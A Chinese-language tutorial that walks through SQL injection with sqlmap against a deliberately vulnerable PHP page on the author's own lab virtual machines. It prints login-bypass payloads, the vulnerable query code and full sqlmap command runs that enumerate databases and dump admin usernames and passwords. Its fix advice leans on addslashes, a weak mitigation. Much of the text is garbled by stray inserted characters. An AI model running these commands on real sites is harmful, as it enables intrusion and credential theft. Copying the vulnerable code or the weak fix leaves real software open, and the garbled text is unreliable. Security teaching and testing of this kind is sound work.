有一款工具叫sqlmap主要用于識(shí)別sql漏洞并注入，這里我就寫一篇教程教大家如何使用。
因?yàn)閟ql注入是非法的，所以我就使用兩臺(tái)自己的虛擬機(jī)進(jìn)行測(cè)試，請(qǐng)大家不要在別人的網(wǎng)站上搞破壞。(現(xiàn)在大部分網(wǎng)站已經(jīng)沒有sql漏洞了，修復(fù)方法也很簡(jiǎn)單)

一、什么是sql漏洞

要搞清楚sql漏洞，首先要搞清楚sql語(yǔ)句。sql全稱Structured Query Language(結(jié)構(gòu)化查詢語(yǔ)言)，是一種編程語(yǔ)言，主要應(yīng)用于數(shù)據(jù)庫(kù)查詢。一般服務(wù)器安裝的數(shù)據(jù)庫(kù)有Microsoft Access、mysql、postgreysql等等。這里我使用mysql。下面我就舉一些查詢的例子。
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
這一句就是從admin表中查找user為test并且pass為123456的記錄，并將滿足要求的記錄輸出，一般登錄頁(yè)面就是用這條語(yǔ)句查詢的。
但是如果我輸入的密碼是" OR "1"="1，用戶名是test，那么sql語(yǔ)句豈不是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
很明顯，WHERE后的表達(dá)式一定返回true，于是mysql會(huì)將每條記錄都輸出，而網(wǎng)站誤以為這個(gè)用戶名是正確的，然后讓你以test的身份登錄。
如果網(wǎng)站還設(shè)有管理權(quán)限，那么你可以試試密碼為" OR "1"="1" AND writable = TRUE AND ""="，這樣，sql查詢語(yǔ)句就是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
其中user = "test" AND pass = "" OR "1"="1"始終返回true，所以實(shí)際條件為
writable = TRUE AND ""=""，即writable = TRUE，于是mysql會(huì)將writable為true的記錄輸出
還有一種，是查看文章，一般是通過GET參數(shù)id來查詢的
SELECT * FROM articles WHERE id = 1;
如果網(wǎng)站沒有對(duì)id進(jìn)行校驗(yàn)，那么不妨用id=1 AND 1=1來測(cè)試
SELECT * FROM articles WHERE id = 1 AND 1=1;
沒報(bào)錯(cuò)說明可能可以注入，改成id=1 AND 1=2，如果說文章沒有找到，進(jìn)一步說明可以注入，在改成id="，如果mysql報(bào)錯(cuò)，一般網(wǎng)站會(huì)顯示出來，那么基本上就算可以注入了。
我就用這個(gè)例子進(jìn)行注入

二、搭建環(huán)境

我選用的是kali linux 17.3作為攻擊者，Ubuntu lts 18.04作為受害服務(wù)器，先搭建服務(wù)器，可以參考Ubuntu18.04 如何搭建Apache2+php5.6+mysql服務(wù)器，把可注入網(wǎng)頁(yè)放在/article.php，其代碼如下。

<?phpif (!isset($_GET['id'])){echo '沒有設(shè)置參數(shù)id';die(1); }$host = 'localhost'; $user = 'test'; $pass = '123456'; $conn = mysql_connect($host,$user,$pass); if (!$conn){echo '無法連接至數(shù)據(jù)庫(kù)'; }$sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在這里 $query = mysql_query($sql,$conn); $row = mysql_fetch_array($query); if (!$row){echo '訪問的文章不存在'; } else {echo $row['content']; }mysql_close($conn);?>

搭建好整個(gè)網(wǎng)站后，在mysql中的情形如下



當(dāng)然，我注入不可能是為了看到那幾篇文章，其實(shí)我通過網(wǎng)頁(yè)也可以直接看到它，我的目的是看到一些隱私數(shù)據(jù)，比如admin表中的賬號(hào)和密碼

三、注入前測(cè)試

服務(wù)器地址為192.168.3.59，先訪問網(wǎng)頁(yè)查看是否可以注入。



顯然，網(wǎng)頁(yè)本身沒有什么問題。使用id="進(jìn)行測(cè)試。

顯然mysql發(fā)現(xiàn)sql有語(yǔ)法錯(cuò)誤，所以沒有任何查詢結(jié)果。


和預(yù)期完全相符，說明這個(gè)頁(yè)面可以注入。

四、sqlmap注入

對(duì)于kali linux，sqlmap默認(rèn)安裝。
對(duì)于Ubuntu，使用apt install sqlmap進(jìn)行安裝
對(duì)于其他系統(tǒng)，到官網(wǎng)下載源碼，sqlmap使用python編寫的，所以可能需要安裝python
下面開始注入。
sqlmap -u '192.168.3.59/article.php?id=1，一定要加入GET參數(shù)，不然sqlmap不知道使用什么參數(shù)去注入。輸出差不多是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'_____H_____ ___[,]_____ ___ ___ {1.1.11#stable} |_ -| . [.] | .'| . | |___|_ [(]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:30:43[11:30:43] [INFO] resuming back-end DBMS 'mysql' [11:30:43] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA --- [11:30:43] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12 [11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:30:43

從上述輸出來看，可以注入，下面正式開始注入。
sqlmap -u '192.168.3.59/article.php?id=1' --dbs，輸出是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs_____H_____ ___[.]_____ ___ ___ {1.1.11#stable} |_ -| . [,] | .'| . | |___|_ [(]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:37:43[11:37:43] [INFO] resuming back-end DBMS 'mysql' [11:37:43] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA --- [11:37:43] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12 [11:37:43] [INFO] fetching database names [11:37:43] [INFO] the SQL query used returns 2 entries [11:37:43] [INFO] retrieved: information_schema [11:37:43] [INFO] retrieved: website available databases [2]: [*] information_schema [*] website[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:37:43

注入發(fā)現(xiàn)兩個(gè)數(shù)據(jù)庫(kù)information_schema和website
information_schema主要是mysql數(shù)據(jù)庫(kù)、表、列的信息，沒有什么，website是網(wǎng)站的數(shù)據(jù)，對(duì)這個(gè)數(shù)據(jù)庫(kù)進(jìn)行注入。
sqlmap -u '192.168.3.59/article.php?id=1 -D website --tables，輸出為

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables_____H_____ ___[(]_____ ___ ___ {1.1.11#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:41:14[11:41:14] [INFO] resuming back-end DBMS 'mysql' [11:41:14] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA --- [11:41:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12 [11:41:14] [INFO] fetching tables for database: 'website' [11:41:14] [INFO] the SQL query used returns 2 entries [11:41:14] [INFO] retrieved: admin [11:41:14] [INFO] retrieved: articles Database: website [2 tables] +----------+ | admin | | articles | +----------+[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:41:14

發(fā)現(xiàn)有兩張表admin、articles，作為攻擊者肯定注入admin
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns，輸出為

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns_____H_____ ___["]_____ ___ ___ {1.1.11#stable} |_ -| . [(] | .'| . | |___|_ [)]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:43:46[11:43:46] [INFO] resuming back-end DBMS 'mysql' [11:43:46] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA --- [11:43:46] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12 [11:43:46] [INFO] fetching columns for table 'admin' in database 'website' [11:43:47] [INFO] the SQL query used returns 3 entries [11:43:47] [INFO] retrieved: "id","int(11)" [11:43:47] [INFO] retrieved: "user","text" [11:43:47] [INFO] retrieved: "pass","text" Database: website Table: admin [3 columns] +--------+---------+ | Column | Type | +--------+---------+ | user | text | | id | int(11) | | pass | text | +--------+---------+[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:43:47

注入得到了三列user、id、pass，只要得到user和pass，就能得到密碼(一般是網(wǎng)站后臺(tái)管理的登錄密碼)
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump，輸出為

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump_____H_____ ___["]_____ ___ ___ {1.1.11#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:47:33[11:47:33] [INFO] resuming back-end DBMS 'mysql' [11:47:33] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA --- [11:47:33] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12 [11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website' [11:47:33] [INFO] the SQL query used returns 3 entries [11:47:33] [INFO] retrieved: "test1","123456" [11:47:33] [INFO] retrieved: "test2","123456" [11:47:33] [INFO] retrieved: "test3","123456" Database: website Table: admin [3 entries] +--------+--------+ | user | pass | +--------+--------+ | test1 | 123456 | | test2 | 123456 | | test3 | 123456 | +--------+--------+[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv' [11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:47:33

成功得到了管理員賬號(hào)和密碼，注入也就到此結(jié)束。

五、如何修復(fù)sql漏洞

就拿我這個(gè)網(wǎng)頁(yè)漏洞距離，修復(fù)前是

<?phpif (!isset($_GET['id'])){echo '沒有設(shè)置參數(shù)id';die(1); }$host = 'localhost'; $user = 'test'; $pass = '123456'; $conn = mysql_connect($host,$user,$pass); if (!$conn){echo '無法連接至數(shù)據(jù)庫(kù)'; }$sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在這里 $query = mysql_query($sql,$conn); $row = mysql_fetch_array($query); if (!$row){echo '訪問的文章不存在'; } else {echo $row['content']; }mysql_close($conn);?>

導(dǎo)致sql注入的原因是使用了非法字符，那么有很多解決辦法。

• 對(duì)參數(shù)進(jìn)行檢查，比如檢查id是否為一個(gè)整數(shù)
• 對(duì)字符串進(jìn)行轉(zhuǎn)移，因?yàn)橛袝r(shí)候不得不用到引號(hào)，php可以用addslashes函數(shù)
• 安裝現(xiàn)成軟件(雖然我不知道是什么原理，但似乎很多網(wǎng)站都安裝了什么D盾之類的)

六、實(shí)戰(zhàn)

實(shí)際上，sql注入也沒這么簡(jiǎn)單，有時(shí)候需要用字典去猜表名(kali自帶字典)，甚至還有注入不了的情況(可能是因?yàn)樽值洳粔?，即使注入成功獲得密碼也有可能找不到登錄入口點(diǎn)(一般是admin或login文件夾中)，所以本文僅僅是提供一個(gè)方法不能保證注入成功，希望對(duì)大家能有幫助。

總結(jié)

以上是生活随笔為你收集整理的sqlmap 进行sql漏洞注入的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。